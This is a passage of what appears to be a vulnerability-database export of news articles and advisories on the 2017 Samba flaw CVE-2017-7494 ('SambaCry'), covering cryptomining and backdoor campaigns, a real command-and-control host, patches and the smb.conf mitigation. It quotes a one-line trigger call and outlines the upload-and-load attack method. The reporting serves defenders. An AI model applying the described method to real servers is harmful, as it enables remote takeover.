conf [global] section, add the parameter: \nnt pipe support = no \nThen restart the smbd service. \n\n", "modified": "2017-05-25T00:00:00", "published": "2017-05-25T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/86477.htm", "id": "MYHACK58:62201786477", "title": "Vulnerability warning|Samba remote code execution vulnerability, affecting 7 years ago version-bug warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2018-01-27T09:17:41", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "[](<https://2.bp.blogspot.com/-cKxsm9AhNKw/WXnPEYvxJDI/AAAAAAAAtz0/eoTwaojg7o8EzznO9dSVXmIfWyr5YtCpwCLcBGAs/s1600/windows-malware-cryptocurrency-miner.png>)\n\nLast month, we reported on a group of hackers exploiting [**SambaCry**](<https://thehackernews.com/2017/05/samba-rce-exploit.html>)\u2014a 7-year-old critical remote code execution vulnerability in Samba networking software\u2014to [hack Linux computers](<https://thehackernews.com/2017/06/linux-samba-vulnerability.html>) and install malware to mine cryptocurrencies. \n \nThe same group of hackers is now targeting Windows machines with a new backdoor, which is a QT-based re-compiled version of the same malware used to target Linux. \n \nDubbed **CowerSnail** and [detected](<https://securelist.com/cowersnail-from-the-creators-of-sambacry/79087/>) by security researchers at Kaspersky Labs as Backdoor.Win32.CowerSnail, the malware is a fully-featured Windows backdoor that allows its creators to remotely execute any commands on the infected systems. \n \nWondering how these two separate campaigns are connected? \n \nInterestingly, the CowerSnail backdoor uses the same command and control (C&C) server as the malware that was used to infect Linux machines to mine cryptocurrency last month by exploiting the then-recently exposed SambaCry vulnerability. 
\n\n\n> Common C&C Server Location \u2014 cl.ezreal.space:20480\n\n[SambaCry vulnerability](<https://thehackernews.com/2017/05/samba-rce-exploit.html>) (CVE-2017-7494), named due to its similarities to the Windows SMB flaw exploited by the [WannaCry ransomware](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) that recently wreaked havoc worldwide, affected all Samba versions newer than Samba 3.5.0 released over the past seven years. \n \nShortly after the public revelation of its existence, SambaCry was exploited by this group of hackers to remotely install cryptocurrency mining software\u2014\"**CPUminer**\" that mines cryptocurrencies like Bitcoin, Litecoin, Monero and others\u2014on Linux systems. \n \nBut now, the same hackers are targeting both, Windows and Linux computers, with CPUminer by utilising computing resources of the compromised systems in order to make the profit. \n\n\n> \"After creating two separate Trojans, each designed for a specific platform and each with its own peculiarities, it is highly probable that this group will produce more malware in the future,\" Sergey Yunakovsky of Kaspersky Lab said in a blog post.\n\nIn separate research, security researcher Omri Ben Bassat\u200f [reported](<http://www.intezer.com/eternalminer-copycats/>) about more copycat groups of hackers who are exploiting the same SambaCry vulnerability for cryptocurrency mining and installing \"**[Tsunami backdoor](<https://thehackernews.com/2016/02/linux-mint-hack.html>)**,\" an IRC-based DDoS botnet malware that's been known for infecting Mac OS X and IoT devices in the past. \n \nFor those unaware: Samba is open-source software (re-implementation of SMB/CIFS networking protocol) that offers Linux/Unix servers with Windows-based file and print services and runs on the majority of operating systems and IoT devices. \n \nDespite being patched in late May, the SambaCry bug is actively being exploited by hackers. 
Just last week, researchers spotted a new piece of malware, called **[SHELLBIND](<https://thehackernews.com/2017/07/linux-malware-sambacry.html>)**, exploiting the flaw to backdoor Network Attached Storage (NAS) devices.\n", "modified": "2017-07-27T11:40:12", "published": "2017-07-27T00:40:00", "id": "THN:B1F7A116FFB321FFB433B2511F0594AA", "href": "https://thehackernews.com/2017/07/cowersnail-windows-backdoor.html", "type": "thn", "title": "CowerSnail \u2014 Windows Backdoor from the Creators of SambaCry Linux Malware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:06:40", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "[](<https://2.bp.blogspot.com/-IfU802XsX6s/WSaDGq07jCI/AAAAAAAAs1w/qr8caqavXxccixsBzn9XPPsIm27uRro4QCLcB/s1600/samba-remote-code-exploit.png>)\n\nA 7-year-old critical remote code execution vulnerability has been discovered in **Samba networking software** that could allow a remote attacker to take control of an affected Linux and Unix machines. \n \nSamba is open-source software (re-implementation of SMB networking protocol) that runs on the majority of operating systems available today, including Windows, Linux, UNIX, IBM System 390, and OpenVMS. \n \nSamba allows non-Windows operating systems, like GNU/Linux or Mac OS X, to share network shared folders, files, and printers with Windows operating system. \n \nThe newly discovered remote code execution vulnerability ([CVE-2017-7494](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7494>)) affects all versions newer than Samba 3.5.0 that was released on March 1, 2010. 
\n\n\n> \"All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it,\" Samba wrote in an [advisory](<https://www.samba.org/samba/security/CVE-2017-7494.html>) published Wednesday.\n\n \n\n\n### Linux version of EternalBlue Exploit?\n\n[](<https://4.bp.blogspot.com/-fOULxArzmZQ/WSZ8ob6G6eI/AAAAAAAAs1Y/O2gCnLtxcn8gnrWw_E3OrHdtGy4kXSECQCLcB/s1600/samba-remote-exploit-shodan.png>)\n\nAccording to the Shodan computer search engine, more than 485,000 Samba-enabled computers exposed port 445 on the Internet, and according to researchers at [Rapid7](<https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life>), more than 104,000 internet-exposed endpoints appeared to be running vulnerable versions of Samba, out of which 92,000 are running unsupported versions of Samba. \n \nSince Samba is the SMB protocol implemented on Linux and UNIX systems, so some experts are saying it is \"Linux version of [EternalBlue](<https://thehackernews.com/2017/04/window-zero-day-patch.html>),\" used by the [WannaCry ransomware](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>). \n \n...or should I say **SambaCry**? \n \nKeeping in mind the number of vulnerable systems and ease of exploiting this vulnerability, the Samba flaw could be exploited at large scale with wormable capabilities. \n \nHome networks with network-attached storage (NAS) devices could also be vulnerable to this flaw. \n \n\n\n### Exploit Code Released! (Bonus: Metasploit Module)\n\n[](<https://3.bp.blogspot.com/-VOFDRP0g7k0/WSaAdUiIGoI/AAAAAAAAs1k/L4i76X065h0DC26g_2Fj1BmS3-S9X65UQCLcB/s1600/metasploit-samba.png>)\n\nThe flaw actually resided in the way Samba handled shared libraries. 
A remote attacker could use this Samba arbitrary module loading vulnerability ([POC code](<https://github.com/omri9741/cve-2017-7494>)) to upload a shared library to a writable share and then cause the server to load and execute malicious code. \n \nThe vulnerability is hell easy to exploit. Once a shared library has been uploaded to a writable share, just one line of code is required to make the server load and execute it. \n\n\n> **simple.create_pipe(\"/path/to/target.so\")**\n\nHowever, the Samba exploit has already been ported to [Metasploit](<https://github.com/hdm/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb>), a penetration testing framework, enabling researchers as well as hackers to exploit this flaw easily. \n \n\n\n### Patch and Mitigations\n\n \nThe maintainers of Samba have [already patched the issue](<https://www.samba.org/samba/history/security.html>) in their new releases, **Samba versions 4.6.4/4.5.10/4.4.14**, and are urging those using a vulnerable version of Samba to install the patch as soon as possible. \n \nBut if you cannot upgrade to the latest versions of Samba immediately, you can work around the vulnerability by adding the following line to the [global] section of your Samba configuration file smb.conf: \n\n\n> **nt pipe support = no**\n\nOnce added, restart the network's SMB daemon (smbd) and you are done. This change will prevent clients from fully accessing some network machines, as well as disable some expected functions for connected Windows systems. \n \nWhile Linux distribution vendors, including Red Hat and Ubuntu, have already released patched versions for their users, the larger risk comes from NAS device consumers, whose devices might not be updated as quickly. 
\n \nCraig Williams of Cisco said that given the fact that most NAS devices run Samba and have very valuable data, the vulnerability \"has potential to be the first large-scale Linux ransomware worm.\" \n \n**Update:** Samba maintainers have also [provided patches](<https://www.samba.org/samba/patches/>) for older and unsupported versions of Samba. \n \nMeanwhile, Netgear released a [security advisory](<https://kb.netgear.com/000038779/Security-Advisory-for-CVE-2017-7494-Samba-Remote-Code-Execution>) for CVE-2017-7494, saying a large number of its routers and NAS product models are affected by the flaw because they use Samba version 3.5.0 or later. \n \nHowever, the company currently released firmware fixes for only [ReadyNAS products running OS 6.x](<https://kb.netgear.com/26212/ReadyNAS-OS-6-Updating-Firmware>).\n", "modified": "2017-05-26T10:15:22", "published": "2017-05-24T20:23:00", "id": "THN:9D54715DA42C8EB2A5D3C8AA0A5EE0B7", "href": "https://thehackernews.com/2017/05/samba-rce-exploit.html", "type": "thn", "title": "7-Year-Old Samba Flaw Lets Hackers Access Thousands of Linux PCs Remotely", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:07:01", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "[](<https://3.bp.blogspot.com/-BS9ZI7RQY4Y/WTvi9z0BxrI/AAAAAAAAtFw/fKf-wYHTtU4lqmxZKs3f_lVdHKd3N4WjACLcB/s1600/samba-linux-server.png>)\n\nRemember [SambaCry](<https://thehackernews.com/2017/05/samba-rce-exploit.html>)? \n \nTwo weeks ago we reported about a 7-year-old critical remote code execution vulnerability in Samba networking software (re-implementation of SMB networking protocol) that allows a remote hacker to take full control of a vulnerable Linux and Unix machines. \n \nTo know more about the SambaCry vulnerability (CVE-2017-7494) and how it works, you can [read our previous article](<https://thehackernews.com/2017/05/samba-rce-exploit.html>). 
\n \nAt that time, nearly 485,000 Samba-enabled computers were found to be exposed on the Internet, and researchers predicted that the SambaCry-based attacks also have potential to spread just like [WannaCry ransomware](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) widely. \n \nThe prediction came out to be quite accurate, as honeypots set up by the team of researchers from [Kaspersky Lab](<https://securelist.com/78674/sambacry-is-coming/>) have captured a malware campaign that is exploiting SambaCry vulnerability to infect Linux computers with cryptocurrency mining software. \n \nAnother security researcher, Omri Ben Bassat\u200f, independently [discovered](<https://twitter.com/omri9741/status/872731228859809793>) the same campaign and named it \"EternalMiner.\" \n \nAccording to the researchers, an unknown group of hackers has started hijacking Linux PCs just a week after the Samba flaw was disclosed publicly and installing an upgraded version of \"CPUminer,\" a cryptocurrency mining software that mines \"**Monero**\" digital currency. \n \nAfter compromising the vulnerable machines using SambaCry vulnerability, attackers execute two payloads on the targeted systems: \n\n\n * INAebsGB.so \u2014 A reverse-shell that provides remote access to the attackers.\n * cblRWuoCc.so \u2014 A backdoor that includes cryptocurrency mining utilities \u2013 CPUminer.\n\n> \"Through the reverse-shell left in the system, the attackers can change the configuration of a miner already running or infect the victim\u2019s computer with other types of malware,\" Kaspersky researchers say.\n\nMining cryptocurrencies can be a costly investment as it requires an enormous amount of computing power, but such cryptocurrency-mining malware makes it easier for cybercriminals by allowing them to utilise computing resources of compromised systems to make the profit. 
\n \nIf you have been following The Hacker News regularly, you must be aware of [Adylkuzz](<https://thehackernews.com/2017/05/smb-exploit-cryptocurrency-mining.html>), a cryptocurrency-mining malware that was using a Windows SMB vulnerability at least two weeks before the outbreak of WannaCry ransomware attacks. \n \nThe [Adylkuzz malware](<https://thehackernews.com/2017/05/smb-exploit-cryptocurrency-mining.html>) was also mining Monero by utilizing the enormous amount of computing resources of the compromised Windows systems. \n\n\n[](<https://2.bp.blogspot.com/-En5hfAHlL_o/WTveCH6ckLI/AAAAAAAAtFg/eN2SE5B1gSogSwIJoldwzzV8yBPTtwq6wCLcB/s1600/Monero-mining-software.png>)\n\n \nThe attackers behind the SambaCry-based CPUminer attack have already earned 98 XMR, which is worth 5,380 today, and this figure is continuously rising with the increase in the number of compromised Linux systems. \n\n\n> \"During the first day they gained about 1 XMR (about $55 according to the currency exchange rate for 08.06.2017), but during the last week they gained about 5 XMR per day,\" the researchers say.\n\nThe maintainers of Samba have already [patched the issue](<https://www.samba.org/samba/history/security.html>) in their new Samba versions 4.6.4/4.5.10/4.4.14, and are urging those using a vulnerable version of Samba to install the patch as soon as possible.\n", "modified": "2017-06-10T12:16:41", "published": "2017-06-10T01:16:00", "id": "THN:4706A097E7EBD85B2426246B35CDC5E6", "href": "https://thehackernews.com/2017/06/linux-samba-vulnerability.html", "type": "thn", "title": "Warning! 
Hackers Started Using \"SambaCry Flaw\" to Hack Linux Systems", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:06:59", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "[](<https://4.bp.blogspot.com/-W7qON8E4XPQ/WW8UKkBfj5I/AAAAAAAAtrA/yX6XHNoym1oYwi3gPXyGvn0oBkjSFM5NwCLcBGAs/s1600/sambacry-backdoor-nas-devices.png>)\n\nRemember **[SambaCry](<https://thehackernews.com/2017/05/samba-rce-exploit.html>)**? \n \nAlmost two months ago, we reported about a 7-year-old critical remote code execution vulnerability in Samba networking software, allowing a hacker to remotely take full control of a vulnerable Linux and Unix machines. \n \nWe dubbed the vulnerability as SambaCry, because of its similarities to the [Windows SMB vulnerability](<https://thehackernews.com/2017/04/window-zero-day-patch.html>) exploited by the [WannaCry ransomware](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) that wreaked havoc across the world over two months ago. \n \nDespite being [patched](<https://www.samba.org/samba/security/CVE-2017-7494.html>) in late May, the vulnerability is currently being leveraged by a new piece of malware to target the Internet of Things (IoT) devices, particularly Network Attached Storage (NAS) appliances, researchers at Trend Micro [warned](<http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry/>). \n \nFor those unfamiliar: Samba is open-source software (re-implementation of SMB/CIFS networking protocol), which offers Linux/Unix servers with Windows-based file and print services and runs on the majority of operating systems, including Linux, UNIX, IBM System 390, and OpenVMS. 
\n \nShortly after the public revelation of its existence, the SambaCry vulnerability (CVE-2017-7494) was exploited mostly to install [cryptocurrency mining software](<https://thehackernews.com/2017/06/linux-samba-vulnerability.html>)\u2014\"CPUminer\" that mines \"[Monero](<https://thehackernews.com/2017/05/cryptocurrency-mining-botnet.html>)\" digital currency\u2014on Linux systems. \n \nHowever, the latest malware campaign involving SambaCry spotted by researchers at Trend Micro in July mostly targets NAS devices used by small and medium-size businesses. \n \n\n\n### SHELLBIND Malware Exploits SambaCry to Targets NAS Devices\n\n \nDubbed **SHELLBIND**, the malware works on various architectures, including MIPS, ARM and PowerPC, and is delivered as a shared object (.SO) file to Samba public folders and loaded via the SambaCry vulnerability. \n \nOnce deployed on the targeted machine, the malware establishes communication with the attackers' command and control (C&C) server located in East Africa, and modifies firewall rules to ensure that it can communicate with its server. \n \nAfter successfully establishing a connection, the malware grants the attackers access to the infected device and provides them with an open command shell in the device, so that they can issue any number and type of system commands and eventually take control of the device. \n \nIn order to find the affected devices that use Samba, attackers can leverage the Shodan search engine and write the original malware files to their public folders. \n\n\n> \"It is quite easy to find devices that use Samba in Shodan: searching for port 445 with a 'samba' string will turn up a viable IP list,\" researchers said while explaining the flaw. \n\n> \"An attacker would then simply need to create a tool that can automatically write malicious files to every IP address on the list. 
Once they write the files into the public folders, the devices with the SambaCry vulnerability could become ELF_SHELLBIND.A victims.\"\n\nHowever, it is not clear what the attackers do with the compromised devices or what their actual motive for compromising them is. \n \nThe [SambaCry vulnerability](<https://thehackernews.com/2017/05/samba-rce-exploit.html>) is hell easy to exploit and could be used by remote attackers to upload a shared library to a writable share and then cause the server to load and execute the malicious code. \n \nThe maintainers of Samba already [patched](<https://www.samba.org/samba/security/CVE-2017-7494.html>) the issue in Samba versions 4.6.4/4.5.10/4.4.14, so you are advised to patch your systems against the vulnerability as soon as possible. \n \nJust make sure that your system is running an updated Samba version. \n \nAlso, attackers need to have write access to a shared location on the target system to deliver the payload, which is another mitigating factor that might lower the rate of infection.\n", "modified": "2017-07-19T08:23:32", "published": "2017-07-18T21:23:00", "id": "THN:9DF1743B35B2E69D4835136091D08EAD", "href": "https://thehackernews.com/2017/07/linux-malware-sambacry.html", "type": "thn", "title": "New Linux Malware Exploits SambaCry Flaw to Silently Backdoor NAS Devices", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Samba is the standard Windows interoperability suite of programs for Linux and Unix. 
", "modified": "2017-05-27T02:53:53", "published": "2017-05-27T02:53:53", "id": "FEDORA:219F3605E539", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: samba-4.4.14-0.fc24", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Samba is the standard Windows interoperability suite of programs for Linux and Unix. ", "modified": "2017-05-27T03:06:08", "published": "2017-05-27T03:06:08", "id": "FEDORA:0B8006061CC2", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: samba-4.5.10-0.fc25", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Samba is the standard Windows interoperability suite of programs for Linux and Unix. ", "modified": "2017-06-03T17:39:59", "published": "2017-06-03T17:39:59", "id": "FEDORA:BC7B0601FC16", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: samba-4.6.4-0.fc26", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:38", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "A patch for a critical vulnerability impacting the free networking software Samba was issued Wednesday. The flaw poses a severe threat to users, with approximately 104,000 Samba installations vulnerable to remote takeover. More troubling, experts say, the vulnerability can be exploited with just one line of code.\n\nSamba is a popular standard for providing Windows-based file and print services. It allows for interoperability between Unix and Linux systems and Microsoft Windows. With it, Linux, Mac and FreeBSD users can set up and share folders on Windows computers using the server message block (SMB) protocol. 
The vulnerability ([CVE-2017-7494](<https://www.samba.org/samba/security/CVE-2017-7494.html>)) affects versions 3.5 (released March 1, 2010) and onwards of Samba.\n\n\u201cWhile the WannaCry ransomworm impacted Windows systems and was easily identifiable, with clear remediation steps, the Samba vulnerability will impact Linux and Unix systems and could present significant technical obstacles to obtaining or deploying appropriate remediations,\u201d [wrote Rapid7 in a security bulletin](<https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life>).\n\nComparisons are being made between the [WannaCry ransomware attacks ](<https://threatpost.com/next-nsa-exploit-payload-could-be-much-worse-than-wannacry/125743/>)and the Samba vulnerability because like WannaCry, the Samba vulnerability could be a conduit for a \u201cwormable\u201d exploit that spreads quickly. Also, any exploit taking advantage of the Samba vulnerability would also take advantage of bugs in the same SMB protocol used by the NSA exploits used to spread WannaCry.\n\n\u201cIt\u2019s trivial to trigger the vulnerability (just a one-line exploit). An attacker has to find an open SMB share (TCP/445), upload a shared library to the writable share, and then cause the server to load and execute it,\u201d [warned security researcher Xavier Mertens](<https://isc.sans.edu/forums/diary/Critical+Vulnerability+in+Samba+from+350+onwards/22452/>), with the SANS Internet Storm Center.\n\nAs of this morning, Rapid7 said there does not appear to be any signs the vulnerability is being exploited in the wild. However, researchers said that proof-of-concept exploit code is publicly available.\n\n\u201cWe believe these vulnerable systems are likely conduits into organization networks; but it\u2019s also likely that many of these devices are personal, IoT devices. 
Many home and corporate network storage systems run Samba and it\u2019s very straightforward to enable the Samba service on any Linux endpoint,\u201d said Bob Rudis, lead data scientist with Rapid7.\n\nOn Wednesday, [The Samba Team](<https://www.samba.org/samba/security/CVE-2017-7494.html>), a group of approximately 40 developers, released security updates that address a vulnerability in all versions of Samba from 3.5.0 onward. Additionally, there is a mitigation available within the configuration of Samba itself.\n\n\u201cAdding the argument \u201cnt pipe support = no\u201d to the global section of the smb.conf file and restarting the service will also mitigate the threat,\u201d wrote Cisco [in a bulletin posted Thursday](<https://blogs.cisco.com/security/talos/samba-vuln-details>).\n\nAccording to the Samba Team, the vulnerability was found by a researcher identified as \u201csteelo\u201d and the patch was developed by Volker Lendecke of SerNet and the Samba Team.\n", "modified": "2017-06-02T00:00:01", "published": "2017-05-25T12:20:32", "id": "THREATPOST:6B393C6EA80E795EF303485AFABE5327", "href": "https://threatpost.com/samba-patches-wormable-bug-exploitable-with-one-line-of-code/125915/", "type": "threatpost", "title": "Samba Patches Critical Bug Exploitable With One Line Of Code", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:34", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "Unknown attackers are using a recently patched [vulnerability in Samba](<https://threatpost.com/samba-patches-wormable-bug-exploitable-with-one-line-of-code/125915/>) to spread a resource-intensive cryptocurrency mining utility. 
To date, the operation has netted the attackers just under $6,000 USD, but the number of compromised computers is growing, meaning that a significant number of Samba deployments on *NIX servers remain unpatched.\n\nThe attack also demonstrates that the vulnerability in Samba, [CVE-2017-7494,](<https://access.redhat.com/security/cve/cve-2017-7494>) can extend EternalBlue-like attacks into Linux and UNIX environments. Samba is a software package that runs on Linux and UNIX servers and sets up file and print services over the SMB networking protocol, integrating those services into a Windows environment.\n\nThe [Samba vulnerability](<https://threatpost.com/samba-patches-wormable-bug-exploitable-with-one-line-of-code/125915/>) is similar to the SMB bug exploited on May 12 by attackers using the NSA\u2019s EternalBlue exploit to spread [WannaCry ransomware](<https://threatpost.com/leaked-nsa-exploit-spreading-ransomware-worldwide/125654/>). Experts warned that EternalBlue can be fitted with any measure of attack, and they have a similar message about this flaw, which has been nicknamed SambaCry.\n\nResearchers at Kaspersky Lab said that one of their honeypots snagged on May 30 some of the first exploits targeting the Samba vulnerability. The payload was a two-headed threat: a Linux backdoor and a mining utility called Cpuminer that is leveraging the processing power of its victims to create Monero cryptocurrency.\n\n\u201cThe attacked machine turns into a workhorse on a large farm, mining crypto-currency for the attackers,\u201d Kaspersky Lab said in a [report](<https://securelist.com/sambacry-is-coming/78674/>) published on Securelist.com.\n\nThe researchers said the attackers\u2019 Monero wallet and pool address are hardcoded in the attack.\n\n\u201cAccording to the log of the transactions, the attackers received their first crypto-coins on the very next day, on April 30th,\u201d Kaspersky Lab said. 
\u201cDuring the first day they gained about 1 XMR (about $55 according to the currency exchange rate for 08.06.2017), but during the last week they gained about 5 XMR per day. This means that the botnet of devices working for the profit of the attackers is growing.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/06/06224309/sambacry_05.png>)\n\nAs of Friday, the attackers had mined about $6,000 USD, and Kaspersky Lab said it was unsure about the scale of the attack. Upon disclosure of the Samba vulnerability almost three weeks ago, Rapid7 said an internet scan using its ProjectSonar software found more than 104,000 endpoints running vulnerable versions of Samba over port 445, the SMB port. More than 92,000 are running versions of Samba that have no patches available. The vulnerability was introduced into Samba in 2010 in version 3.5.0; admins should upgrade to patched versions: 4.6.4, 4.5.10 and 4.4.14.\n\nKaspersky Lab said the exploit is assembled as a Samba plugin, below. After running a check\u2014a file containing random symbols\u2014to see whether the server has write permissions for the network, the attack must then brute-force the full path to dropped file. The most obvious paths are laid out in Samba instruction manuals, Kaspersky Lab said. Once it finds the path, the exploit is loaded and executed in the context of the Samba server process using the vulnerability; it runs only in virtual memory.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/06/06224314/sambacry_02.png>)\n\nKaspersky Lab said the attacks captured by its honeypot contained two files, a Linux backdoor and the miner. INAebsGB.so and cblRWuoCc.so respectively. INAebsGB.so is a reverse shell that connects to the port of the IP address specified by the owner giving it remote access to the shell.\n\n\u201cAs a result, the attackers have an ability to execute remotely any shell-commands. 
They can literally do anything they want, from downloading and running any programs from the Internet, to deleting all the data from the victim\u2019s computer,\u201d Kaspersky Lab said, adding that this is similar to the SambaCry exploit in Metasploit.\n\nThe other file, cblRWuoCc.so, downloads and executes Cpuminer from a domain registered on April 29.\n\nCoincidentally, another set of attackers used EternalBlue to spread a cryptocurrency miner called [Adylkuzz](<https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/>) for Monero on Windows machines. Monero is marketed as a privacy conscious cryptocurrency, and goes to great lengths to obfuscate its blockchain making it a challenge to trace any activity.\n\nThe Adylkuzz attacks pre-date WannaCry with the first samples going back to April 24, researchers at Proofpoint said. More than 20 virtual private servers were scanning the internet for targets running port 445 exposed, the same port used by SMB traffic when connected to the internet, and the same port abused by EternalBlue and DoublePulsar.\n", "modified": "2017-06-12T13:34:17", "published": "2017-06-12T09:34:17", "id": "THREATPOST:5800C37DAB0716BD2D308FB187B6B7E1", "href": "https://threatpost.com/attackers-mining-cryptocurrency-using-exploits-for-samba-vulnerability/126191/", "type": "threatpost", "title": "Attackers Mining Cryptocurrency Using Exploits for Samba Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:36", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "Device manufacturers are combing through code again this week to determine whether their products are affected by a vulnerability tied to the SMB file-sharing protocol.\n\nThe vulnerability, (CVE-2017-7494) [disclosed last Wednesday](<https://threatpost.com/samba-patches-wormable-bug-exploitable-with-one-line-of-code/125915/>), affects versions of 3.5.0 
onward of Samba, the free software re-implementation of the SMB/CIFS networking protocol. If exploited, the bug could allow authenticated attackers to execute arbitrary code remotely and take control of an affected system.\n\n> Samba Releases Security Updates <https://t.co/BkdgitQrl8>\n> \n> \u2014 US-CERT (@USCERT_gov) [May 25, 2017](<https://twitter.com/USCERT_gov/status/867542749053976576>)\n\nSamba pushed a patch for versions 4.4 and higher [a week ago](<https://www.samba.org/samba/security/CVE-2017-7494.html>) but companies, many of which make products that use Samba, are continuing to learn about the vulnerability\u2019s scope.\n\n[Cisco confirmed Tuesday](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170530-samba>) that two of its products are affected by the bug and that it\u2019s investigating which of its other products might be affected. Netgear said last week it was also looking into its products and that it had already pushed firmware updates for some it found were affected by the vulnerability.\n\nSo far, Cisco says it\u2019s in the middle of developing fixes for two affected products, its Network Analysis Module and Video Surveillance Media Server. 
The company claims it\u2019s reviewing whether the following 11 additional products are affected:\n\n * Cisco Identity Services Engine (ISE)\n * Cisco Small Business RV Series RV320 Dual Gigabit WAN VPN Router\n * Cisco Common Services Platform Collector\n * Cisco IP Interoperability and Collaboration System (IPICS)\n * Cisco Expressway Series\n * Cisco MXE 3500 Series Media Experience Engines\n * Cisco TelePresence Video Communication Server (VCS)\n * Cisco VDS Recorder\n * Cisco VDS-TV Caching Nodes\n * Cisco VDS-TV Streamer\n * Cisco VDS-TV Vault\n\nConversely the company says three products, its Application and Content Networking System \u2013 ACNS, Web Security Appliance \u2013 WSA, and Digital Media Manager, are not vulnerable.\n\nNetgear was one of the first companies to push a fix for affected products out the gate. It released firmware fixes for its ReadyNAS products running OS 6.x last week. A Netgear forum moderator said Friday the company plans to move to a newer version of Samba on OS 6 in the future but in the meantime has backported Samba\u2019s fix.\n\nThe company also pushed [new versions of RAIDar](<https://community.netgear.com/t5/Using-your-ReadyNAS/Any-plans-for-Samba-fix-for-CVE-2017-7494/td-p/1290160>), the firmware ReadyNAS devices use, to mitigate the vulnerability on Tuesday. 
Users can download the [Legacy Sparc](<https://kb.netgear.com/000038792/RAIDiator-Version-4-1-16-Sparc>), [x86](<https://kb.netgear.com/000038793/RAIDiator-x86-Version-4-2-31>), and [ARM](<https://kb.netgear.com/000038794/RAIDiator-arm-Version-5-3-13-for-ReadyNAS-Duo-v2-NV-v2>) firmware for the network storage devices via the company\u2019s support page.\n\nThe company [says it is also investigating](<https://kb.netgear.com/000038779/Security-Advisory-for-CVE-2017-7494-Samba-Remote-Code-Execution>) whether ReadyNAS products running 4.1, 4.2, 5.x, and 6.x, its ReadyDATA products, and a handful of routers are vulnerable:\n\n * C7100V\n * C6220\n * C3700\n * N450/CG3000Dv2\n * R7000P\n * R6900P\n * C3000\n * C6250\n * C6300\n * C7000\n\nThe company is recommending users concerned about the vulnerability disable write access to drives shared via SMB or simply remove USB storage devices connected to their router or gateway.\n\n\u201cThe potential for remote code execution remains if you do not complete all recommended steps,\u201d Netgear warns in its advisory.\n\nSynology, another company that manufactures NAS devices, [released updates](<https://www.synology.com/en-global/support/security/Important_Information_Regarding_Samba_Vulnerability_CVE_2017_7494>) (6.1.1-4 and DSM 6.0.3-1) for two affected products \u2013 DiskStation Manager (DSM) 6.1 and DSM 6.0 \u2013 last week. The company, headquartered in Taipei, is reportedly working on a fix for another affected product, its web-based operating system Synology Router Manager (SRM) 1.1. That fix should arrive this week, Synology says.\n\nThe Samba vulnerability initially drew comparisons to [WannaCry](<https://threatpost.com/leaked-nsa-exploit-spreading-ransomware-worldwide/125654/>), the ransomware worm responsible for 200,000 infections across 150 countries earlier this month. Both vulnerabilities rely on leveraging a vulnerability in the SMB protocol. 
